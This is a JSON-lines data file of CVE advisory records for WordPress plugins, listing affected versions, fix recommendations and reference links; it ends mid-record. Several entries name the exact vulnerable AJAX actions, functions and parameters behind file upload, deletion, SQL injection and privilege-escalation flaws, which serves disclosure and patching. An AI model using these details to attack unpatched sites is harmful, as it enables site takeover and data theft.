{"CVE_ID":"CVE-2021-4356","slug":"nmedia-user-file-uploader","versionEndExcluding":"18.3","description":"The Frontend File Manager plugin for WordPress is vulnerable to Unauthenticated Arbitrary File Download in versions up to, and including, 18.2. This is due to lacking authentication protections, capability checks, and sanitization, all on the wpfm_file_meta_update AJAX action. This makes it possible for unauthenticated attackers to download arbitrary files on the site, potentially leading to site takeover.","refs":"[{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-frontend-file-manager-plugin-fixed-multiple-critical-vulnerabilities\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-frontend-file-manager-plugin-fixed-multiple-critical-vulnerabilities\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2554359%40nmedia-user-file-uploader&new=2554359%40nmedia-user-file-uploader&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2554359%40nmedia-user-file-uploader&new=2554359%40nmedia-user-file-uploader&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/79e2011c-5e4d-4d02-831f-6b4dcfcaa51e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/79e2011c-5e4d-4d02-831f-6b4dcfcaa51e?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4351","slug":"nmedia-user-file-uploader","versionImpact":"18.2","versionEndExcluding":"18.3","description":"The Frontend File Manager plugin for WordPress is vulnerable to Unauthenticated Post Meta Change in versions up to, and including, 18.2. This is due to lacking authentication protections, capability checks, and sanitization, all on the wpfm_file_meta_update AJAX action. This makes it possible for unauthenticated attackers to change the meta data of certain posts and pages.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5539aa79-66ad-43fa-967c-2bec877061e0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5539aa79-66ad-43fa-967c-2bec877061e0?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-frontend-file-manager-plugin-fixed-multiple-critical-vulnerabilities\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-frontend-file-manager-plugin-fixed-multiple-critical-vulnerabilities\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4350","slug":"nmedia-user-file-uploader","versionImpact":"18.2","versionEndExcluding":"18.3","description":"The Frontend File Manager plugin for WordPress is vulnerable to Unauthenticated HTML Injection in versions up to, and including, 18.2. This is due to lacking authentication protections on the wpfm_send_file_in_email AJAX action. This makes it possible for unauthenticated attackers to send emails using the site with a custom subject, recipient email, and body with unsanitized HTML content.  This effectively lets the attacker use the site as a spam relay.","refs":"[{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-frontend-file-manager-plugin-fixed-multiple-critical-vulnerabilities\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-frontend-file-manager-plugin-fixed-multiple-critical-vulnerabilities\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/49150180-9de0-4318-b21b-779daaeb7a52?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/49150180-9de0-4318-b21b-779daaeb7a52?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4328","slug":"n-media-woocommerce-checkout-fields","versionEndExcluding":"18.0","description":"The WooCommerce Checkout Field Manager WordPress plugin before 18.0 does not validate files to be uploaded, which could allow unauthenticated attackers to upload arbitrary files such as PHP on the server","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4dc72cd2-81d7-4a66-86bd-c9cfaf690eed\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4dc72cd2-81d7-4a66-86bd-c9cfaf690eed\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13775","slug":"woocommerce-support-ticket-system","versionImpact":"17.8","versionEndExcluding":"17.9","description":"The WooCommerce Support Ticket System plugin for WordPress is vulnerable to unauthorized access and loss of data due to missing capability checks on the 'ajax_delete_message', 'ajax_get_customers_partial_list', and 'ajax_get_admins_list' functions in all versions up to, and including, 17.8. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary posts, and read names, emails, and capabilities of all users.","recommendation":"Update to version 17.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/woocommerce-support-ticket-system\\\/17930050#item-description__change-log\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/woocommerce-support-ticket-system\\\/17930050#item-description__change-log\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72dc919a-c13d-49b4-927d-a0bb837b63dd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72dc919a-c13d-49b4-927d-a0bb837b63dd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10627","slug":"woocommerce-support-ticket-system","versionImpact":"17.7","versionEndExcluding":"17.8","description":"The WooCommerce Support Ticket System plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the ajax_manage_file_chunk_upload() function in all versions up to, and including, 17.7. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 17.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1ac218f6-0bfa-480c-9159-d75a027022ba?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1ac218f6-0bfa-480c-9159-d75a027022ba?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/woocommerce-support-ticket-system\\\/17930050\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/woocommerce-support-ticket-system\\\/17930050\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10626","slug":"woocommerce-support-ticket-system","versionImpact":"17.7","versionEndExcluding":"17.8","description":"The WooCommerce Support Ticket System plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the delete_uploaded_file() function in all versions up to, and including, 17.7. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).","recommendation":"Update to version 17.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eeb2c829-579f-41e2-ad5f-8e4fc125d980?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eeb2c829-579f-41e2-ad5f-8e4fc125d980?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/woocommerce-support-ticket-system\\\/17930050\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/woocommerce-support-ticket-system\\\/17930050\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10625","slug":"woocommerce-support-ticket-system","versionImpact":"17.6","versionEndExcluding":"17.8","description":"The WooCommerce Support Ticket System plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the delete_tmp_uploaded_file() function in all versions up to, and including, 17.7. This makes it possible for unauthenticated attackers to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).","recommendation":"Update to version 17.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ddf1cecd-c630-498d-9aa0-3d0adeb73033?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ddf1cecd-c630-498d-9aa0-3d0adeb73033?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/woocommerce-support-ticket-system\\\/17930050\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/woocommerce-support-ticket-system\\\/17930050\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6043","slug":"wp-malware-removal","versionImpact":"17.0","versionEndExcluding":"17.1","description":"The Malcure Malware Scanner \u2014 #1 Toolset for WordPress Malware Removal plugin for WordPress is vulnerable to Arbitrary File Deletion due to a missing capability check on the wpmr_delete_file() function in all versions up to, and including, 16.8. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary files making remote code execution possible. This is only exploitable when advanced mode is enabled on the site.","recommendation":"Update to version 17.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-malware-removal\\\/tags\\\/16.8\\\/wpmr.php#L4570\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-malware-removal\\\/tags\\\/16.8\\\/wpmr.php#L4570\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-malware-removal\\\/tags\\\/16.8\\\/wpmr.php#L6304\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-malware-removal\\\/tags\\\/16.8\\\/wpmr.php#L6304\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-malware-removal\\\/tags\\\/16.8\\\/wpmr.php#L6401\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-malware-removal\\\/tags\\\/16.8\\\/wpmr.php#L6401\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d44fe4d7-1af5-4e26-a33c-43a9cce4174c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d44fe4d7-1af5-4e26-a33c-43a9cce4174c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7772","slug":"wp-malware-removal","versionImpact":"16.8","versionEndExcluding":"16.9","description":"The Malcure Malware Scanner \u2014 #1 Toolset for WordPress Malware Removal plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 16.8 via the wpmr_inspect_file() function due to a missing capability check. This makes it possible for authenticated attackers, with subscriber-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.","recommendation":"Update to version 16.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3309451%40wp-malware-removal&new=3309451%40wp-malware-removal&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3309451%40wp-malware-removal&new=3309451%40wp-malware-removal&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/18ce05fa-0b10-4796-9e78-03e653b862da?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/18ce05fa-0b10-4796-9e78-03e653b862da?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11150","slug":"wp-user-extra-fields","versionImpact":"16.6","versionEndExcluding":"16.7","description":"The WordPress User Extra Fields plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the delete_tmp_uploaded_file() function in all versions up to, and including, 16.6. This makes it possible for unauthenticated attackers to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).","recommendation":"Update to version 16.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ad39d797-9230-41d9-a335-864845b56aa0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ad39d797-9230-41d9-a335-864845b56aa0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/user-extra-fields\\\/12949844\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/user-extra-fields\\\/12949844\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10800","slug":"wp-user-extra-fields","versionImpact":"16.6","versionEndExcluding":"16.7","description":"The WordPress User Extra Fields plugin for WordPress is vulnerable to privilege escalation due to a missing capability check on the ajax_save_fields() function in all versions up to, and including, 16.6. This makes it possible for authenticated attackers, with subscriber-level access and above, to add custom fields that can be updated and then use the check_and_overwrite_wp_or_woocommerce_fields function to update the wp_capabilities field to have administrator privileges.","recommendation":"Update to version 16.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a18fa7e6-813d-4b48-bd4e-5232fb8382d1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a18fa7e6-813d-4b48-bd4e-5232fb8382d1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/user-extra-fields\\\/12949844\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/user-extra-fields\\\/12949844\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10801","slug":"wp-user-extra-fields","versionImpact":"16.5","versionEndExcluding":"16.6","description":"The WordPress User Extra Fields plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the ajax_manage_file_chunk_upload() function in all versions up to, and including, 16.5. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. User registration must be enabled for this to be exploited.","recommendation":"Update to version 16.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6a60e2c3-4597-4b21-ad20-6a00e483fcf1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6a60e2c3-4597-4b21-ad20-6a00e483fcf1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/user-extra-fields\\\/12949844\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/user-extra-fields\\\/12949844\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8292","slug":"wp-recall","versionImpact":"16.26.8","versionEndExcluding":"16.26.9","description":"The WP-Recall \u2013 Registration, Profile, Commerce & More plugin for WordPress is vulnerable to privilege escalation\/account takeover in all versions up to, and including, 16.26.8. This is due to the plugin not properly verifying a user's identity during new order creation. This makes it possible for unauthenticated attackers to supply any email through the user_email field and update the password for that user during new order creation. This requires the commerce addon to be enabled in order to exploit.","recommendation":"Update to version 16.26.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8fa4b5df-dc71-49de-880b-895eb1d9cdca?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8fa4b5df-dc71-49de-880b-895eb1d9cdca?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-recall\\\/tags\\\/16.26.8\\\/add-on\\\/commerce\\\/functions-frontend.php#L113\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-recall\\\/tags\\\/16.26.8\\\/add-on\\\/commerce\\\/functions-frontend.php#L113\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-recall\\\/tags\\\/16.26.8\\\/add-on\\\/commerce\\\/classes\\\/class-rcl-create-order.php#L127\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-recall\\\/tags\\\/16.26.8\\\/add-on\\\/commerce\\\/classes\\\/class-rcl-create-order.php#L127\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-recall\\\/tags\\\/16.26.8\\\/rcl-functions.php#L1339\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-recall\\\/tags\\\/16.26.8\\\/rcl-functions.php#L1339\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3145798\\\/wp-recall\\\/trunk\\\/add-on\\\/commerce\\\/classes\\\/class-rcl-create-order.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3145798\\\/wp-recall\\\/trunk\\\/add-on\\\/commerce\\\/classes\\\/class-rcl-create-order.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9770","slug":"wp-recall","versionImpact":"16.26.11","versionEndExcluding":"16.26.12","description":"The WP-Recall  WordPress plugin before 16.26.12 does not sanitize and escape a parameter before using it in a SQL statement, allowing admins to perform SQL injection attacks","recommendation":"Update to version 16.26.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d31f8713-b807-4ac4-8897-7d62a93bb2db\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d31f8713-b807-4ac4-8897-7d62a93bb2db\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1325","slug":"wp-recall","versionImpact":"16.26.10","versionEndExcluding":"16.26.12","description":"The WP-Recall \u2013 Registration, Profile, Commerce & More plugin for WordPress is vulnerable to arbitrary shortcode execution due to a missing capability check on the 'rcl_preview_post' AJAX endpoint in all versions up to, and including, 16.26.10. This makes it possible for authenticated attackers, with Subscriber-level access and above, to execute arbitrary shortcodes.","recommendation":"Update to version 16.26.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3250094\\\/wp-recall\\\/trunk\\\/add-on\\\/publicpost\\\/functions-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3250094\\\/wp-recall\\\/trunk\\\/add-on\\\/publicpost\\\/functions-ajax.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ad3b9040-05ed-452d-9b3f-26d1a93c62ba?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ad3b9040-05ed-452d-9b3f-26d1a93c62ba?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1324","slug":"wp-recall","versionImpact":"16.26.10","versionEndExcluding":"16.26.12","description":"The WP-Recall \u2013 Registration, Profile, Commerce & More plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'public-form' shortcode in all versions up to, and including, 16.26.10 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 16.26.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3250094\\\/wp-recall\\\/trunk\\\/add-on\\\/publicpost\\\/shortcodes.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3250094\\\/wp-recall\\\/trunk\\\/add-on\\\/publicpost\\\/shortcodes.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3e0be093-d61a-4634-ba9b-91dd7328e8cd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3e0be093-d61a-4634-ba9b-91dd7328e8cd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1323","slug":"wp-recall","versionImpact":"16.26.10","versionEndExcluding":"16.26.12","description":"The WP-Recall \u2013 Registration, Profile, Commerce & More plugin for WordPress is vulnerable to SQL Injection via the 'databeat' parameter in all versions up to, and including, 16.26.10 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 16.26.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3250094\\\/wp-recall\\\/trunk\\\/add-on\\\/rcl-chat\\\/core.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3250094\\\/wp-recall\\\/trunk\\\/add-on\\\/rcl-chat\\\/core.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ae5b4d81-c2f1-4d0d-b7b0-5556bf0451f5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ae5b4d81-c2f1-4d0d-b7b0-5556bf0451f5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1322","slug":"wp-recall","versionImpact":"16.26.10","versionEndExcluding":"16.26.12","description":"The WP-Recall \u2013 Registration, Profile, Commerce & More plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 16.26.10 via the 'feed' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for unauthenticated attackers to view data from password protected, private, or draft posts that they should not have access to.","recommendation":"Update to version 16.26.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3250094\\\/wp-recall\\\/trunk\\\/add-on\\\/rcl-chat\\\/core.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3250094\\\/wp-recall\\\/trunk\\\/add-on\\\/rcl-chat\\\/core.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c667be65-e6d3-40e1-aeec-384d309fde3d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c667be65-e6d3-40e1-aeec-384d309fde3d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9771","slug":"wp-recall","versionImpact":"16.26.11","versionEndExcluding":"16.26.12","description":"The WP-Recall  WordPress plugin before 16.26.12 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 16.26.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c33adc08-99c5-42e1-a2e3-e7c3412a6a3f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c33adc08-99c5-42e1-a2e3-e7c3412a6a3f\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4496","slug":"miniorange-saml-20-single-sign-on","versionEndExcluding":"16.0.8","description":"The SAML SSO Standard WordPress plugin version 16.0.0 before 16.0.8, SAML SSO Premium WordPress plugin version 12.0.0 before 12.1.0 and SAML SSO Premium Multisite WordPress plugin version 20.0.0 before 20.0.7 does not validate that the redirect parameter to its SSO login endpoint points to an internal site URL, making it vulnerable to an Open Redirect issue when the user is already logged in.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/be21f355-0e5b-4ad7-9d8f-85e9a0101ddc\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/be21f355-0e5b-4ad7-9d8f-85e9a0101ddc\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e6c4c8c7-1dcd-45bf-8582-f12accca6fac\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e6c4c8c7-1dcd-45bf-8582-f12accca6fac\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/af2e30c7-0787-4fe2-97ee-bc616f7178a1\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/af2e30c7-0787-4fe2-97ee-bc616f7178a1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11109","slug":"wp-google-places-review-slider","versionImpact":"15.5","versionEndExcluding":"15.6","description":"The WP Google Review Slider WordPress plugin before 15.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 15.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/93619da1-a8d6-43b6-b1be-8d50ab6f29f7\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/93619da1-a8d6-43b6-b1be-8d50ab6f29f7\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6693","slug":"wccp-pro","versionImpact":"15.0","versionEndExcluding":"15.3","description":"The wccp-pro WordPress plugin before 15.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 15.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2b1af7eb-452a-43f4-aae9-edd8e7312fe8\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2b1af7eb-452a-43f4-aae9-edd8e7312fe8\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6690","slug":"wccp-pro","versionImpact":"15.0","versionEndExcluding":"15.3","description":"The wccp-pro WordPress plugin before 15.3 contains an open-redirect flaw via the referrer parameter, allowing redirection of users to external sites","recommendation":"Update to version 15.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/09c6848d-30dc-4382-ae74-b470f586e142\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/09c6848d-30dc-4382-ae74-b470f586e142\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-52728","slug":"responsive-posts-carousel-pro","versionImpact":"15.0","versionEndExcluding":"15.1","description":"Improper Control of Filename for Include\/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in WebCodingPlace Responsive Posts Carousel WordPress Plugin allows PHP Local File Inclusion. This issue affects Responsive Posts Carousel WordPress Plugin: from n\/a through 15.0.","recommendation":"Update to version 15.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/responsive-posts-carousel-pro\\\/vulnerability\\\/wordpress-responsive-posts-carousel-wordpress-plugin-plugin-15-0-local-file-inclusion-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/responsive-posts-carousel-pro\\\/vulnerability\\\/wordpress-responsive-posts-carousel-wordpress-plugin-plugin-15-0-local-file-inclusion-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10011","slug":"buddypress","versionImpact":"14.1.0","versionEndExcluding":"14.2.1","description":"The BuddyPress plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 14.1.0 via the id parameter. This makes it possible for authenticated attackers, with Subscriber-level access and above, to perform actions on files outside of the originally intended directory and enables file uploads to directories outside of the web root. Depending on server configuration it may be possible to upload files with double extensions. This vulnerability only affects Windows.","recommendation":"Update to version 14.2.1, or a newer patched 